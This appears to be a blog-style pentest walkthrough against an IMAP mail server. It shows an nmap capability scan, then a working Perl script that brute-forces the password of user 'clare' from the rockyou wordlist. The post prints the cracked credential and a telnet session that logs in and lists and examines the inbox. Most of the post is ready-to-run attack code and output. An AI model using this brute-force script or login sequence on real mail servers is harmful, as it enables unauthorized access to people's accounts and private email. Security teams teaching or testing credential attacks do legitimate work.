Scanning the Remote Host
We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server is capable of.
root@asus:~% nmap -p 143 -sC 148.32.42.5 Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 12:39 MDT Nmap scan report for mail.acme.com (148.32.42.5) Host is up (0.00013s latency). PORT STATE SERVICE 143/tcp open imap |_imap-capabilities: AUTH=PLAINA0001 SASL-IR IDLE more IMAP4rev1 have ID capabilities OK ENABLE Pre-login post-login LITERAL+ listed LOGIN-REFERRALS Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds root@asus:~%
Finding logins for valid IMAP users
We got a valid username from another pentest against another service. the user name is 'clare' but we do not know what her password is. We can write a small perl script to enumerate valid logins on the remote IMAP host using Net::IMAP perl module.
#!/usr/bin/env perl
use strict;
use warnings;
use Net::IMAP::Simple;
my $user = "clare";
my $wordlist = "rockyou.txt";
open(my $fh, '<', $wordlist) or die $!;
print "[*] Searching for valid IMAP logins...\n";
my $imap = Net::IMAP::Simple->new("mail.acme.com") or die "$Net::IMAP::Simple::errstr\n";
while(my $pass = <$fh>) {
chomp($pass);
if ($imap->login($user,$pass)) {
print "[+] OK LOGIN | $user:$pass\n";
}
}
$imap->quit();
If we run the script...
root@asus:~% perl imap.pl [*] Searching for valid IMAP logins... [+] OK LOGIN | clare:jessica root@asus:~%
As you can see we got some valid logins for the IMAP server. Our next step is to try and explore the inboxes we just got access to.
Logging in to the IMAP server
We can telnet in to the remote IMAP server with our valid user credentials to try and browse the inbox of the account
root@asus:~% telnet 148.32.42.5 143 Trying 148.32.42.5... Connected to 148.32.42.5. Escape character is '^]'. * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready. ME -> 1 LOGIN clare jessica 1 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in ME -> 2 LIST "" "*" * LIST (\HasNoChildren) "/" INBOX 2 OK List completed (0.000 + 0.000 secs). ME -> 3 EXAMINE INBOX * FLAGS (\Answered \Flagged \Deleted \Seen \Draft) * OK [PERMANENTFLAGS ()] Read-only mailbox. * 0 EXISTS * 0 RECENT * OK [UIDVALIDITY 1569265821] UIDs valid * OK [UIDNEXT 1] Predicted next UID * OK [HIGHESTMODSEQ 1] Highest 3 OK [READ-ONLY] Examine completed (0.000 + 0.000 secs). ME -> 4 LOGOUT * BYE Logging out 4 OK Logout completed. Connection closed by foreign host. root@asus:~%
No comments:
Post a Comment